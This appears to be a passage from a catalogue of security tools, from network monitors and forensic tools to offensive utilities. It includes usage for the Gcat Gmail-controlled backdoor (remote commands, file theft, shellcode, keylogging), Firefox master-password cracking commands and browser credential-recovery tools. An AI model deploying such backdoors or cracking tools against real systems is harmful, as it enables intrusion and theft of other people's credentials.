  • netmap support (open source; wire speed processing; only Intel hardware NICs or any hypervisor VM type)
  • Supports L2TP decapsulation, VLAN untagging and MPLS processing in mirror mode
  • Can work on server/soft-router
  • Can detect DoS/DDoS in 1-2 seconds
  • Tested up to 10GE with 5-6 Mpps on Intel i7 2600 with Intel Nic 82599
  • Complete plugin support
  • Has complete support for the most popular attack types

Supported platforms:
  • Linux (Debian 6/7/8, CentOS 6/7, Ubuntu 12+)
  • FreeBSD 9, 10, 11
  • Mac OS X Yosemite

What is a "flow" in FastNetMon terms? It's one or multiple UDP, TCP or ICMP connections with unique src IP, dst IP, src port, dst port and protocol.

Example for cpu load on Intel i7 2600 with Intel X540/82599 NIC on 400 kpps load:


To enable sFlow, simply specify the IP of the server with FastNetMon installed and port 6343. To enable NetFlow, simply specify the IP of the server with FastNetMon installed and port 2055.

Why did we write this? Because we couldn't find any software solving this problem in the open source world!


Download FastNetMon

Fing - Find out Which Devices are Connected to your Wi-Fi Network


Find out which devices are connected to your Wi-Fi network, in just a few seconds.

Fast and accurate, Fing is a professional App for network analysis. A simple and intuitive interface helps you evaluate security levels, detect intruders and resolve network issues.
  • Discovers all devices connected to a Wi-Fi network. Unlimited devices and unlimited networks, for free! 
  • Displays MAC Address and device manufacturer.
  • Enter your own names, icons, notes and location
  • Full search by IP, MAC, Name, Vendor and Notes 
  • History of all discovered networks. 
  • Share via Twitter, Facebook, Message and E-mail
  • Service Scan: Find hundreds of open ports in a few seconds.
  • Wake On LAN: Switch on your devices from your mobile or tablet! 
  • Ping and traceroute: Understand your network performance.
  • Automatic DNS lookup and reverse lookup
  • Checks the availability of Internet connection
  • Works also with hosts outside your local network 
  • Tracks when a device has gone online or offline
  • Launch Apps for specific ports, such as Browser, SSH, FTP 
  • Displays NetBIOS names and properties
  • Displays Bonjour info and properties
  • Supports identification by IP address for bridged networks
  • Sort by IP, MAC, Name, Vendor, State, Last Change. 
  • Free of charge, no banner Ads 
  • Available for iPhone, iPad and iPod Touch with retina and standard displays.
  • Integrates with Fingbox to sync and backup your customizations, merge networks with multiple access points, monitor remote networks via Fingbox Sentinels, get notifications of changes, and much more. 
  • Fing is available on several other platforms, including Windows, OS X and Linux. Check them out!

Download Fing

Firefox Autocomplete Spy - Tool to View or Delete Autofill Data from Mozilla Firefox


Firefox Autocomplete Spy is a free tool to easily view and delete all your autocomplete data from the Firefox browser.

Firefox stores Autocomplete entries (typically form fields) such as login name, email, address, phone, credit/debit card number, search history etc. in an internal database file.

'Firefox Autocomplete Spy' helps you to automatically find and view all the Autocomplete history data from the Firefox profile location. For each entry, it displays the following details:
  • Field Name
  • Value
  • Total Used Count
  • First Used Date
  • Last Used Date

You can also use it to view data from a history file belonging to another user on the same or a remote system. It also provides a one-click solution to delete all the displayed Autocomplete data from the history file.

It is very simple for everyone to use, which especially makes it a handy tool for forensic investigators.

Firefox Autocomplete Spy is fully portable and works on both 32-bit & 64-bit platforms starting from Windows XP to Windows 8.

Features
  • Instantly view all the autocomplete data from Firefox form history file
  • On startup, it auto detects Autocomplete file from default profile location
  • Sort feature to arrange the data in various orders to make it easier to search through hundreds of entries.
  • Delete all the Autocomplete data with just a click of button
  • Save the displayed autocomplete list to HTML/XML/TEXT/CSV file
  • Easier and faster to use with its enhanced user friendly GUI interface
  • Fully Portable, does not require any third party components like JAVA, .NET etc
  • Support for local Installation and uninstallation of the software

How to Use

Firefox Autocomplete Spy is easy to use with its simple GUI interface.

Here are the brief usage details
  • Launch FirefoxAutocompleteSpy on your system
  • By default it will automatically find and display the autocomplete file from default profile location. You can also select the desired file manually.
  • Next click on 'Show All' button and all stored Autocomplete data will be displayed in the list as shown in screenshot 1 below.
  • If you want to remove all the entries, click on 'Delete All' button below.
  • Finally you can save all displayed entries to HTML/XML/TEXT/CSV file by clicking on 'Export' button and then select the type of file from the drop down box of 'Save File Dialog'.


Download Firefox Autocomplete Spy

FireMaster - The Firefox Master Password Cracking Tool


FireMaster is the First ever tool to recover the lost Master Password of Firefox.

The master password is used by Firefox to protect the stored login/password information for all visited websites. If the master password is forgotten, then there is no way to recover it and the user will lose all the passwords stored behind it.

However you can now use FireMaster to recover the forgotten master password and get back all the stored Login/Passwords.

FireMaster supports Dictionary, Hybrid, Brute-force and advanced Pattern based Brute-force password cracking techniques to recover simple to complex passwords. The advanced pattern based password recovery mechanism reduces cracking time significantly, especially when the password is complex.

FireMaster is successfully tested with all versions of Firefox starting from 1.0 to latest version v13.0.1.

It works on a wide range of platforms starting from Windows XP to Windows 8.

Firefox Password Manager and Master Password

Firefox comes with a built-in password manager tool which remembers usernames and passwords for all the websites you visit. This login/password information is stored in encrypted form in Firefox database files residing in the user's profile directory.

However, anybody can just launch the password manager from the Firefox browser and view the credentials. Also, one can just copy these database files to a different machine and view them offline using tools such as FirePassword.

Hence, to protect from such threats, Firefox uses a master password to provide enhanced security. By default Firefox does not set a master password. However, once you have set the master password, you need to provide it every time you view login credentials. So if you lose the master password, that means you have lost all the stored passwords as well.

So far there was no way to recover these credentials once you have lost the master password. Now the FireMaster can help you to recover the master password and get back all the sign-on information.

Internals of FireMaster

Once you have lost the master password, there is no way to recover it as it is not stored at all.
Whenever the user enters the master password, Firefox uses it to decrypt the encrypted data associated with a known string. If the decrypted data matches this known string then the entered password is correct. FireMaster uses a similar technique to check for the master password, but in a more optimized way.
The entire operation goes like this:
  • FireMaster generates passwords on the fly through various methods.
  • Then it computes the hash of the password using a known algorithm.
  • Next this password hash is used to decrypt the encrypted data for known plain text (i.e. "password-check").
  • Now if the decrypted string matches with the known plain text (i.e. "password-check") then the generated password is the master password.

Firefox stores the details about the encrypted string, salt, algorithm and version information in the key database file key3.db in the user's profile directory. You can just copy this key3.db file to a different directory and specify the corresponding path to FireMaster. You can also copy this key3.db to any other high-end machine for a faster recovery operation.

FireMaster supports following password recovery methods

1) Dictionary Cracking Method
In this mode, FireMaster uses a dictionary file with each word on a separate line to perform the operation. You can find lots of online dictionaries of different sizes and pass them on to FireMaster. This method is quicker and can find common passwords.

2) Hybrid Cracking Method
This is an advanced dictionary method, in which each word in the dictionary file is prefixed or suffixed with a generated string from a known character list. This can find passwords like pass123, 12test, test34 etc. From the specified character list (such as 123), all combinations of strings are generated and appended or prefixed to the dictionary word based on user settings.

3) Brute-force Cracking Method
In this method, all possible combinations of characters from the given character list are generated and then subjected to the cracking process. This may take a long time depending on the number of characters and the position count specified.

4) Pattern based Brute-force Cracking Method
The pattern based cracking method significantly reduces the password recovery time, especially when the password is complex. This method can be used when you know the exact password length and remember a few characters.

How to use FireMaster?

First you need to copy the key3.db file to a temporary directory. Then you specify this directory path to FireMaster as the last argument.

Here is the general usage information

FireMaster [-q]
           [-d -f <dictfile>]
           [-h -f <dictfile> -n <maxlen> -g "charlist" [ -s | -p ] ]
           [-b -m <minlen> -l <maxlen> -c "charlist" -p "pattern" ]
           <firefox profile path>

Note: From v5.0 onwards, you can specify 'auto' (without quotes) in place of the profile path to automatically detect the default profile path.
 
Dictionary Crack Options:
   -d  Perform dictionary crack
   -f  Dictionary file with words on each line
    
Hybrid Crack Options:
   -h  Perform hybrid crack operation using dictionary passwords.
Hybrid crack can find passwords like pass123, 123pass etc
   -f  Dictionary file with words on each line
   -g  Group of characters used for generating the strings
   -n  Maximum length of strings to be generated using above character list
These strings are added to the dictionary word to form the password
   -s  Suffix the generated characters to the dictionary word(pass123)
   -p  Prefix the generated characters to the dictionary word(123pass)
    
Brute Force Crack Options:
   -b  Perform brute force crack
   -c  Character list used for brute force cracking process
   -m  [Optional] Specify the minimum length of password
   -l  Specify the maximum length of password
   -p  [Optional] Specify the pattern for the password

Examples of FireMaster
// Dictionary Crack
FireMaster.exe -d -f c:\dictfile.txt auto

// Hybrid Crack
FireMaster.exe -h -f c:\dictfile.txt -n 3 -g "123" -s auto

// Brute-force Crack
FireMaster.exe -q -b -m 3 -l 10 -c "abcdetps123" "c:\my test\firefox"

// Brute-force Crack with Pattern
FireMaster.exe -q -b -m 3 -c "abyz126" -l 10 -p "pa??f??123" auto


Download FireMaster

FireMasterCracker - Firefox Master Password Cracking Software



The Firefox browser uses a master password to protect the stored login passwords for all visited websites. If the master password is forgotten, then there is no way to recover it and the user will also lose all the website login passwords.

In such cases, FireMasterCracker can help you to recover the lost master password. It uses a dictionary based password cracking method. You can find good collections of password dictionaries (also called wordlists) online.

Though it supports only the Dictionary Crack method, you can easily use tools like Crunch or Cupp to generate a brute-force based or any custom password list file and then use it with FireMasterCracker.

It is very easy to use with its cool & simple interface. It is designed to make things simpler and quicker for users who find it difficult to use the command-line based FireMaster.


FireMasterCracker works on a wide range of platforms starting from Windows XP to Windows 8.

Features

Here are prime features of FireMasterCracker
  • Free & Easiest tool to recover the Firefox Master Password
  • Supports Dictionary based Password Recovery method
  • Automatically detects the current Firefox profile location
  • Displays detailed statistics during Cracking operation
  • Stop the password cracking operation any time.
  • Easy to use with cool graphics interface.
  • Generate Password Recovery report in HTML/XML/TEXT format.
  • Includes Installer for local Installation & Uninstallation. 

FirePassword - Firefox Username & Password Recovery Tool


FirePassword is first ever tool (back in early 2007) released to recover the stored website login passwords from Firefox Browser.

Like other browsers, Firefox also stores the login details, such as username and password, for every website visited by the user, with the user's consent. All these secret details are stored securely in the Firefox sign-on database in an encrypted format. FirePassword can instantly decrypt and recover these secrets even if they are protected with a master password.

FirePassword can also be used to recover sign-on passwords from a different profile (for other users on the same system) as well as from a different operating system (such as Linux, Mac etc.). This greatly helps forensic investigators, who can copy the Firefox profile data from the target system to a different machine and recover the passwords offline without affecting the target environment.

This mega release supports password recovery from new password file 'logins.json' starting with Firefox version 32.x.

Note: FirePassword is not hacking or cracking tool as it can only help you to recover your own lost website passwords that are previously stored in Firefox browser.

It works on a wide range of platforms starting from Windows XP to Windows 8.

Features
  • Instantly decrypt and recover stored encrypted passwords from 'Firefox Sign-on Secret Store' for all versions of Firefox.
  • Recover Passwords from Mozilla based SeaMonkey browser also.
  • Supports recovery of passwords from local system as well as remote system. User can specify Firefox profile location from the remote system to recover the passwords.
  • It can recover passwords from the Firefox secret store even when it is protected with a master password. In such a case the user has to enter the correct master password to successfully decrypt the sign-on passwords.
  • Automatically discovers Firefox profile location based on installed version of Firefox.
  • On successful recovery operation, username, password along with a corresponding login website is displayed
  • Fully Portable version, can be run from anywhere.
  • Integrated Installer for assisting you in local Installation & Uninstallation. 

Download FirePassword

Flashlight - Automated Information Gathering Tool for Penetration Testers


Pentesters spend too much time during the information gathering phase. Flashlight (Fener) provides services to scan networks/ports and gather information rapidly on target networks. So Flashlight should be the choice to automate the discovery step during a penetration test. In this article, usage of the Flashlight application will be explained.

For more information about using Flashlight, "-h" or "-help" option can be used.

Parameters for the usage of this application can be listed below

  • -h, --help: It shows the information about using the Flashlight application.
  • -p <ProjectName> or --project <ProjectName>: It sets the project name. This parameter can be used to save different projects in different workspaces.
  • -s <ScanType> or --scan_type <ScanType>: It sets the type of scan. There are four types of scans: Active Scan, Passive Scan, Screenshot Scan and Filtering. These types of scans will be examined later in detail.
  • -d <DestinationNetwork>, --destination <DestinationNetwork>: It sets the network or IP that the scan will be executed against.
  • -c <FileName>, --config <FileName>: It specifies the configuration file. The scan is performed according to the information in the configuration file.
  • -u <NetworkInterface>, --interface <NetworkInterface>: It sets the network interface used during passive scanning.
  • -f <PcapFile>, --pcap_file <PcapFile>: It sets the pcap file that will be filtered.
  • -r <RasterizeFile>, --rasterize <RasterizeFile>: It sets the specific location of the Rasterize JavaScript file which will be used for taking screenshots.
  • -t <ThreadNumber>, --thread <ThreadNumber>: It sets the number of threads. This parameter is valid only in screenshot scanning (screen scan) mode.
  • -o <OutputDirectory>, --output <OutputDirectory>: It sets the directory in which the scan results are saved. The scan results are saved in 3 sub-directories: the "nmap" subdirectory for Nmap scanning results, the "pcap" subdirectory for PCAP files and the "screen" subdirectory for screenshots, all under the output directory given by this parameter. If this option is not set, scan results are saved in the directory that the Flashlight application is running from.
  • -a, --alive: It performs a ping scan to discover up IP addresses before the actual vulnerability scan. It is used for active scan.
  • -g <DefaultGateway>, --gateway <DefaultGateway>: It identifies the IP address of the gateway. If not set, the interface given with the "-I" parameter is chosen.
  • -l <LogFile>, --log <LogFile>: It specifies the log file to save the scan results. If not set, logs are saved in the "flashlight.log" file in the working directory.
  • -k <PassiveTimeout>, --passive_timeout <PassiveTimeout>: It specifies the timeout for sniffing in passive mode. The default value is 15 seconds. This parameter is used for passive scan.
  • -m, --mim: It is used to perform a MITM attack.
  • -n, --nmap-optimize: It is used to optimize the nmap scan.
  • -v, --verbose: It is used to list detailed information.
  • -V, --version: It shows the version of the program.

Videos :


https://www.youtube.com/watch?v=EUMKffaAxzs&list=PL1BVM6VWlmWZOv9Hv8TV2v-kAlUmvA5g7&index=4
https://www.youtube.com/watch?v=qCgW-SfYl1c&list=PL1BVM6VWlmWZOv9Hv8TV2v-kAlUmvA5g7&index=5
https://www.youtube.com/watch?v=98Soe01swR8&list=PL1BVM6VWlmWZOv9Hv8TV2v-kAlUmvA5g7&index=6
https://www.youtube.com/watch?v=9wft9zuh1f0&list=PL1BVM6VWlmWZOv9Hv8TV2v-kAlUmvA5g7&index=7

Installation

apt-get install nmap tshark tcpdump dsniff

In order to install phantomjs easily, you can download and extract it from https://bitbucket.org/ariya/phantomjs/downloads.

The Flashlight application can perform 3 basic scan types and 1 analysis type. Each of them is listed below.

1) Passive Scan

In a passive scan, no packets are sent onto the wire. This type of scan is used for listening to the network and analyzing packets.
To launch a passive scan using Flashlight, a project name should be specified, like "passive-pro-01". In the following command, packets captured on eth0 are saved into the "/root/Desktop/flashlight/output/passive-project-01/pcap" directory, whereas pcap files and all logs are saved into the "/root/Desktop/log" directory.

./flashlight.py -s passive -p passive-pro-01 -i eth0 -o /root/Desktop/flashlight_test -l /root/Desktop/log -v

2) Active Scan

During an active scan, Nmap scripts are used by reading the configuration file. An example configuration file (flashlight.yaml) is stored in the "config" directory under the working directory.

tcp_ports:
   - 21, 22, 23, 25, 80, 443, 445, 3128, 8080
udp_ports:
   - 53, 161
scripts:
   - http-enum

According to this "flashlight.yaml" configuration file, the scan executes against the "21, 22, 23, 25, 80, 443, 445, 3128, 8080" TCP ports and the "53, 161" UDP ports, and runs the "http-enum" script, using Nmap.

Note: During an active scan the "screen_ports" option is unused. This option only works with the screen scan.
The "-a" option is useful to discover up hosts by sending ICMP packets. Besides this, increasing the thread number with the "-t" parameter increases scan speed.

./flashlight.py -p active-project -s active -d 192.168.74.0/24 -t 30 -a -v

By running this command, output files in three different formats (Normal, XML and Grepable) are emitted for four different scan types (Operating system scan, Ping scan, Port scan and Script scan).

The commands that the Flashlight application runs look like this:

  • Operating System Scan: /usr/bin/nmap -n -Pn -O -T5 -iL /tmp/"IPListFile" -oA /root/Desktop/flashlight/output/active-project/nmap/OsScan-"Date"
  • Ping Scan: /usr/bin/nmap -n -sn -T5 -iL /tmp/"IPListFile" -oA /root/Desktop/flashlight/output/active-project/nmap/PingScan-"Date"
  • Port Scan: /usr/bin/nmap -n -Pn -T5 --open -iL /tmp/"IPListFile" -sS -p T:21,22,23,25,80,443,445,3128,8080,U:53,161 -sU -oA /root/Desktop/flashlight/output/active-project/nmap/PortScan-"Date"
  • Script Scan: /usr/bin/nmap -n -Pn -T5 -iL /tmp/"IPListFile" -sS -p T:21,22,23,25,80,443,445,3128,8080,U:53,161 -sU --script=default,http-enum -oA /root/Desktop/flashlight/output/active-project/nmap/ScriptScan-"Date" 

3) Screen Scan

Screen Scan is used to get screenshots of web sites/applications by using directives in the config file (flashlight.yaml). Directives in this file provide screen scan for four ports ("80, 443, 8080, 8443"):

screen_ports:
   - 80, 443, 8080, 8443

A sample screen scan can be performed like this:

./flashlight.py -p project -s screen -d 192.168.74.0/24 -r /usr/local/rasterize.js -t 10 -v

4) Filtering

The Filtering option is used to analyse pcap files. An example for this option is shown below:

./flashlight.py -p filter-project -s filter -f /root/Desktop/flashlight/output/passive-project-02/pcap/20150815072543.pcap -v

By running this command some files are created in the "filter" sub-folder. This option analyzes PCAP packets according to the properties below:
  • Windows hosts
  • Top 10 DNS requests

...


Download Flashlight

Forpix - Software for detecting affine image files


forpix is a forensic program for identifying similar images that are no longer identical due to image manipulation. Hereinafter I will describe the technical background for the basic understanding of the need for such a program and how it works.

From image files or files in general you can create so-called cryptologic hash values, which represent a kind of fingerprint of the file. In practice, these values have the characteristic of being unique. Therefore, if a hash value for a given image is known, the image can be uniquely identified in a large amount of other images by the hash value. The advantage of this fully automated procedure is that the semantic perception of the image content by a human is not required. This methodology is an integral and fundamental component of an effective forensic investigation.

Due to the avalanche effect, which is a necessary feature of cryptologic hash functions, a minimal change of the image, one a human would not even notice, causes a drastic change of the hash value. Although the original image and the manipulated image are almost identical, this no longer applies to the hash values. Therefore the above mentioned identification method is ineffective in the case of similar images.

A method was applied that resolves the ineffectiveness of cryptologic hash values. It uses the fact that an offender is interested in preserving certain image content. To some degree, this will preserve the contrast as well as the color and frequency distribution. The method provides three algorithms to generate robust hash values of the mentioned image features. In case of a manipulation of the image, the hash values change either not at all or only moderately, in proportion to the degree of manipulation. By comparing the hash values of a known image with those of a large quantity of other images, similar images can now be recognized fully automatically.

Download Forpix

FruityWifi v2.2 - Wireless Network Auditing Tool


FruityWifi is an open source tool to audit wireless networks. It allows the user to deploy advanced attacks by directly using the web interface or by sending messages to it.

Initially the application was created to be used with the Raspberry Pi, but it can be installed on any Debian based system.

FruityWifi v2.0 has many upgrades. A new interface, new modules, Realtek chipsets support, Mobile Broadband (3G/4G) support, a new control panel, and more.


A more flexible control panel. Now it is possible to use FruityWifi combining multiple networks and setups:

- Ethernet ⇔ Ethernet,
- Ethernet ⇔ 3G/4G,
- Ethernet ⇔ Wifi,
- Wifi ⇔ Wifi,
- Wifi ⇔ 3G/4G, etc.

Among the new options on the control panel we can change the AP mode between Hostapd and Airmon-ng, allowing the use of more chipsets, such as Realtek.

It is possible to customize each one of the network interfaces, which allows the user to keep the current setup or change it completely.

Changelog

v2.2
  • Wireless service has been replaced by AP module
  • Mobile support has been added
  • Bootstrap support has been added
  • Token auth has been added
  • minor fix
v2.1
  • Hostapd Mana support has been added
  • Phishing service has been replaced by phishing module
  • Karma service has been replaced by karma module
  • Sudo has been implemented (replacement for danger)
  • Logs path can be changed
  • Squid dependencies have been removed from FruityWifi installer
  • Phishing dependencies have been removed from FruityWifi installer
  • New AP options available: hostapd, hostapd-mana, hostapd-karma, airmon-ng
  • Domain name can be changed from config panel
  • New install options have been added to install-FruityWifi.sh
  • Install/Remove have been updated

Download FruityWifi

FTPMap - FTP scanner in C


Ftpmap scans remote FTP servers to identify what software and what versions they are running. It uses program-specific fingerprints to discover the name of the software even when banners have been changed or removed, or when some features have been disabled. FTP-Map can also detect vulnerabilities based on the FTP software/version.

COMPILATION
./configure
make
make install

Using ftpmap is trivial, and the built-in help is self-explanatory:

Examples:
ftpmap -s ftp.c9x.org

ftpmap -P 2121 -s 127.0.0.1

ftpmap -u joe -p joepass -s ftp3.c9x.org

If a named host has several IP addresses, they are all sequentially scanned. During the scan, ftpmap displays a list of numbers: this is the "fingerprint" of the server.

Another indication that can be displayed if login was successful is the FTP PORT sequence prediction. If the difficulty is too low, it means that anyone can steal your files and change their content, even without knowing your password or sniffing your network.

There are very few known fingerprints yet, but submissions are welcome.

Obfuscating FTP servers

This software was written as a proof of concept that security through obscurity doesn't work. Many system administrators think that hiding or changing banners and messages in their server software can improve security.

Don't trust this. Script kiddies just ignore banners. If they read that "XYZ FTP software has a vulnerability", they will try the exploit on all FTP servers they find, whatever software they are running. The same thing goes for free and commercial vulnerability scanners. They probe exploits to find potential holes, and they just discard banners and messages.

On the other hand, removing the software name and version is confusing for the system administrator, who has no way to quickly check what's installed on his servers.

If you want to sleep quietly, the best thing to do is to keep your systems up to date: subscribe to mailing lists and apply vendor patches.

Downloading Ftpmap
git clone git://github.com/Hypsurus/ftpmap 


Download FTPMap

Gcat - A stealthy Backdoor that uses Gmail as a command and control server


A stealthy Python based backdoor that uses Gmail as a command and control server.

Setup

For this to work you need:
  • A Gmail account (Use a dedicated account! Do not use your personal one!)
  • Turn on "Allow less secure apps" under the security settings of the account
This repo contains two files:
  • gcat.py a script that's used to enumerate and issue commands to available clients
  • implant.py the actual backdoor to deploy
In both files, edit the gmail_user and gmail_pwd variables with the username and password of the account you previously set up.
You're probably going to want to compile implant.py into an executable using PyInstaller.

Usage
Gcat

optional arguments:
  -h, --help            show this help message and exit
  -v, --version         show program's version number and exit
  -id ID                Client to target
  -jobid JOBID          Job id to retrieve

  -list                 List available clients
  -info                 Retrieve info on specified client

Commands:
  Commands to execute on an implant

  -cmd CMD              Execute a system command
  -download PATH        Download a file from a clients system
  -exec-shellcode FILE  Execute supplied shellcode on a client
  -screenshot           Take a screenshot
  -lock-screen          Lock the clients screen
  -force-checkin        Force a check in
  -start-keylogger      Start keylogger
  -stop-keylogger       Stop keylogger
  • Once you've deployed the backdoor on a couple of systems, you can check available clients using the list command:
#~ python gcat.py -list
f964f907-dfcb-52ec-a993-543f6efc9e13 Windows-8-6.2.9200-x86
90b2cd83-cb36-52de-84ee-99db6ff41a11 Windows-XP-5.1.2600-SP3-x86
The output is a UUID string that uniquely identifies the system and the OS the implant is running on.
  • Let's issue a command to an implant:
#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -cmd 'ipconfig /all'
[*] Command sent successfully with jobid: SH3C4gv
Here we are telling 90b2cd83-cb36-52de-84ee-99db6ff41a11 to execute ipconfig /all; the script then outputs the jobid that we can use to retrieve the output of that command.
  • Let's get the results!
#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -jobid SH3C4gv     
DATE: 'Tue, 09 Jun 2015 06:51:44 -0700 (PDT)'
JOBID: SH3C4gv
FG WINDOW: 'Command Prompt - C:\Python27\python.exe implant.py'
CMD: 'ipconfig /all'


Windows IP Configuration

        Host Name . . . . . . . . . . . . : unknown-2d44b52
        Primary Dns Suffix  . . . . . . . : 
        Node Type . . . . . . . . . . . . : Unknown
        IP Routing Enabled. . . . . . . . : No
        WINS Proxy Enabled. . . . . . . . : No

-- SNIP --
  • That's the gist of it! But you can do much more as you can see from the usage of the script! ;)

Download Gcat

Geotweet - Social engineering tool for human hacking


Another way to use Twitter and Instagram. Geotweet is an OSINT application that allows you to track tweets and Instagram posts, trace geographical locations and then export them to Google Maps. It allows you to search on tags, world zones and users (info and timeline).

Requirements
  • Python 2.7
  • PyQt4, tweepy, geopy, ca_certs_locater, python-instagram
  • Works on Linux, Windows, Mac OSX, BSD

Installation
git clone https://github.com/Pinperepette/Geotweet_GUI.git
cd Geotweet_GUI
chmod +x Geotweet.py
sudo apt-get install python-pip
sudo pip install tweepy
sudo pip install geopy
sudo pip install ca_certs_locater
sudo pip install python-instagram
python ./Geotweet.py



Download Geotweet

GetHead - HTTP Header Analysis Vulnerability Tool

gethead.py is a Python HTTP Header Analysis Vulnerability Tool. It identifies security vulnerabilities and the lack of protection in HTTP Headers.

Usage:
$ python gethead.py http://domain.com

Changelog
Version 0.1 - Initial Release
  • Written in Python 2.7.5
  • Performs HTTP Header Analysis
  • Reports Header Vulnerabilities

Features in Development
Version 0.2 - Next Release (April 2014 Release)
  • Support for git updates
  • Support for Python 3.3
  • Complete Header Analysis
  • Additional Logic for Severity Classifications
  • Rank Vulnerabilities by Severity
  • Export Findings with Description, Impact, Execution, Fix, and References
  • Export with multi-format options (XML, HTML, TXT)

Version 0.3 - Future Release (May 2014 Release)
  • Replay and Inline Upstream Proxy support to import into other tools
  • Scan domains, sub-domains, and multi-services
  • Header Injection and Fuzzing functionality
  • HTTP Header Policy Bypassing
  • Modularize and port to more platforms
    (e.g. gMinor, Kali, Burp Extension, Metasploit, Chrome, Firefox)

Ghiro 0.2 - Automated Digital Image Forensics Tool


Sometimes forensic investigators need to process digital images as evidence. There are a few tools around, but it is difficult to carry out forensic analysis when a lot of images are involved.

Images contain tons of information; Ghiro extracts this information from the provided images and displays it in a nicely formatted report.

Dealing with tons of images is pretty easy; Ghiro is designed to scale to support gigabytes of images.

All tasks are fully automated: you just have to upload your images and let Ghiro do the work.

Understandable reports and great search capabilities allow you to find a needle in a haystack.

Ghiro is a multi-user environment; different permissions can be assigned to each user. Cases allow you to group image analyses by topic, and you can choose which users are allowed to see your case with a permission schema.

Use Cases

Ghiro can be used in many scenarios: forensic investigators could use it on a daily basis in their analysis lab, but people interested in uncovering secrets hidden in images could benefit as well. Some use case examples are the following:
  • If you need to extract all data and metadata hidden in an image in a fully automated way
  • If you need to analyze a lot of images and do not have much time to read the report for all of them
  • If you need to search a bunch of images for some metadata
  • If you need to geolocate a bunch of images and see them on a map
  • If you have a hash list of "special" images and you want to search for them

Ghiro is also designed to be used in many other scenarios; imagination is the only limit.


MAIN FEATURES

Metadata extraction

Metadata are divided into several categories depending on the standard they come from. Image metadata are extracted and categorized, for example: EXIF, IPTC, XMP.

GPS Localization

Sometimes a geotag is embedded in the image metadata: a bit of GPS data providing the longitude and latitude of where the photo was taken. It is read and the position is displayed on a map.

MIME information

The image MIME type is detected to know the image type you are dealing with, in both compact (example: image/jpeg) and extended form.

Error Level Analysis

Error Level Analysis (ELA) identifies areas within an image that are at different compression levels. The entire picture should be at roughly the same level; if a difference is detected, it likely indicates a digital modification.

Thumbnail extraction

The thumbnails and data related to them are extracted from image metadata and stored for review.

Thumbnail consistency

Sometimes when a photo is edited, the original image is edited but the thumbnail is not. Differences between the thumbnails and the images are detected.

Signature engine 

Over 120 signatures provide evidence about the most critical data to highlight focal points and common exposures.

Hash matching

Suppose you are searching for an image and you have only the hash. You can provide a list of hashes and all images matching are reported.


Gitrob - Reconnaissance tool for GitHub organizations


Gitrob is a command line tool that can help organizations and security professionals find sensitive information in GitHub repositories. The tool will iterate over all public organization and member repositories and match filenames against a range of patterns for files that typically contain sensitive or dangerous information.

How it works

Looking for sensitive information in GitHub repositories is not a new thing; it has been known for a while that things such as private keys and credentials can be found with GitHub's search functionality. Gitrob, however, makes it easier to focus the effort on a specific organization.

The first thing the tool does is to collect all public repositories of the organization itself. It then goes on to collect all the organization members and their public repositories, in order to compile a list of repositories that might be related or have relevance to the organization.

When the list of repositories has been compiled, it proceeds to gather all the filenames in each repository and runs them through a series of observers that will flag the files if they match any patterns of known sensitive files. This step might take a while if the organization is big or if the members have a lot of public repositories.

All of the members, repositories and files will be saved to a PostgreSQL database. When everything has been sifted through, it will start a Sinatra web server locally on the machine, which will serve a simple web application to present the collected data for analysis.


Download Gitrob

GoAccess - Real-time Web Log Analyzer and Interactive Viewer


GoAccess is an open source real-time web log analyzer and interactive viewer that runs in a terminal in *nix systems. It provides fast and valuable HTTP statistics for system administrators that require a visual server report on the fly.

Features 

GoAccess parses the specified web log file and outputs the data to the X terminal.
  • General statistics, bandwidth, etc.
  • Time taken to serve the request (useful to track pages that are slowing down your site)
  • Top visitors
  • Requested files & static files
  • 404 or Not Found
  • Hosts, Reverse DNS, IP Location
  • Operating Systems
  • Browsers and Spiders
  • Referring Sites & URLs
  • Keyphrases
  • Geo Location - Continent/Country/City
  • Visitors Time Distribution
  • HTTP Status Codes
  • Ability to output JSON and CSV
  • Different Color Schemes
  • Support for large datasets + data persistence
  • Support for IPv6
  • Output statistics to HTML
  • and more...
GoAccess allows any custom log format string. Predefined options include, but are not limited to:
  • Amazon CloudFront (Download Distribution).
  • Apache/Nginx Common/Combined + VHosts
  • W3C format (IIS)

Why GoAccess?

The main idea behind GoAccess is being able to quickly analyze and view web server statistics in real time without having to generate an HTML report. Although it is possible to generate an HTML, JSON or CSV report, by default it outputs to a terminal. You can see it more as a monitoring command tool than anything else.


Gping - Ping, But With A Graph


Ping, but with a graph

Install and run
Created/tested with Python 3.4; should run on 2.7 (will require the statistics module though).
pip3 install pinggraph

Tested on Windows and Ubuntu, should run on OS X as well. After installation just run:
gping [yourhost]

If you don't give a host, it pings Google.

Why?
My apartment's internet is all 4G, and while it's normally pretty fast it can be a bit flaky. I often found myself running ping -t google.com in a command window to get a rough idea of the network speed, and I thought a graph would be a great way to visualize the data. I still wanted to just use the command line though, so I decided to try and write a cross-platform one that I could use. And here we are.

Code
For a quick hack the code started off really nice, but after I decided pretty colors were a good addition it quickly got rather complicated. Inside pinger.py is a function plot(); this uses a canvas-like object to "draw" things like lines and boxes to the screen. I found on Windows that changing the colors is slow and caused the screen to flicker, so there's a big mess of a function called process_colors to try and optimize that. Don't ask.


Download Gping

Graudit - Find potential security flaws in source code using grep


Graudit is a simple script and a set of signature files that allow you to find potential security flaws in source code using the GNU utility grep. It's comparable to other static analysis applications like RATS, SWAAT and flaw-finder while keeping the technical requirements to a minimum and being very flexible.

Who should use graudit?
System administrators, developers, auditors, vulnerability researchers and anyone else that cares to know if the application they develop, deploy or otherwise use is secure.

What languages are supported?
  • ASP
  • JSP
  • Perl
  • PHP
  • Python
  • Other (looks for suspicious comments, etc)

USAGE
Graudit supports several options and tries to follow good shell practices. For a list of the options you can run graudit -h or see below. The simplest way to use graudit is:
graudit /path/to/scan

DEPENDENCIES
Required: bash, grep, sed

The following options are available:
  -A  scan ALL files
  -c  number of lines of context to display, default is 2
  -d  database to use
  -h  prints a short help text
  -i  case-insensitive search
  -l  lists databases available
  -L  vim-friendly lines
  -v  prints version number
  -x  exclude these files
  -z  suppress colors
  -Z  high contrast colors


Download Graudit

Grinder - System to Automate the Fuzzing of Web Browsers


Grinder is a system to automate the fuzzing of web browsers and the management of a large number of crashes. Grinder Nodes provide an automated way to fuzz a browser, and generate useful crash information (such as call stacks with symbol information as well as logging information which can be used to generate reproducible test cases at a later stage). A Grinder Server provides a central location to collate crashes and, through a web interface, allows multiple users to login and manage all the crashes being generated by all of the Grinder Nodes.
